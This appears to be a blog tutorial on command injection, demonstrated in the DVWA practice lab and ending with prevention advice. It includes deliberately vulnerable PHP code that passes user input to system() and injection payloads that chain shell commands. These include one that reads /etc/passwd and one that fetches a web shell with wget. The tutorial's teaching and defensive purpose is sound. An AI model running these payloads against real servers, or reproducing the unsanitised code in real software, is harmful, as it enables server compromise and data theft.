Command Injection Attack

A Command Injection attack happens when a web application takes user input and passes it to the system shell (Linux/Windows command line) without proper validation.
An attacker can then append their own commands and make the server execute them.

⚠️ Only practice this inside DVWA or your own lab. Never attempt on real systems without permission.

Simple definition

Command Injection: Injecting OS commands into an application so the server executes unintended system commands.

Example vulnerable code:

system("ping " . $_GET['ip']);

If input is not filtered, attacker can add extra commands.

Real-world impact

Server takeover
File deletion
Data theft

Demonstration in DVWA (Safe Lab)

Step 1: Setup DVWA

Open DVWA
Login
Set security:

DVWA Security → Low

Go to:

DVWA → Command Injection

You’ll see an input box asking for IP address to ping.

Step 2: Normal input

Enter:

127.0.0.1

It runs:

ping 127.0.0.1

Step 3: Inject a command

Now try:

Linux payload

127.0.0.1; ls

What happens:

ping 127.0.0.1
ls

The server runs both commands.

You’ll see directory listing → injection successful.

Other demo payloads (safe for lab)

Show current user:

127.0.0.1; whoami

Show system info:

127.0.0.1; uname -a

Show files:

127.0.0.1; pwd

Windows payload (if DVWA on Windows)

127.0.0.1 & dir

Why it works

Because DVWA low security code is like:

system("ping " . $ip);

It does not sanitize:

So attacker chains commands.

Step 4: Increase security level

Go to:

DVWA Security → Medium / High

Try same payload:

127.0.0.1; ls

Now it fails because:

Input filtering added
Escaping used
Whitelisting applied

Real cybercrime example (India context)

Attackers find a vulnerable admin panel with ping tool.

They inject:

8.8.8.8; cat /etc/passwd

Then escalate:

; wget shell.php

Server compromised → website defaced.

🛡️ Prevention methods

1. Never pass user input to shell

Bad:

system($_GET['cmd']);

Good:
Use built-in functions instead.

2. Input validation

Allow only IP format:

^[0-9.]+$

3. Escape input

PHP:

escapeshellarg()

4. Use parameterized commands

Avoid shell usage completely.

5. Least privilege

Web server should not run as root.

Command Injection Attack

Command Injection Attack

Simple definition

Real-world impact

Demonstration in DVWA (Safe Lab)

Step 1: Setup DVWA

Step 2: Normal input

Step 3: Inject a command

Linux payload

Other demo payloads (safe for lab)

Windows payload (if DVWA on Windows)

Why it works

Step 4: Increase security level

Real cybercrime example (India context)

🛡️ Prevention methods

1. Never pass user input to shell

2. Input validation

3. Escape input

4. Use parameterized commands

5. Least privilege

Leave a Reply Cancel reply

CSRF in DVWA (for learning/demo)

XSS = Cross-Site Scripting using DVWA

SQL Injection using DVWA

The Future AI Internet: Lessons from Moltbook

AI-Enabled Business Decision-Making

Nishant Munjal

Tools

Resources

Legal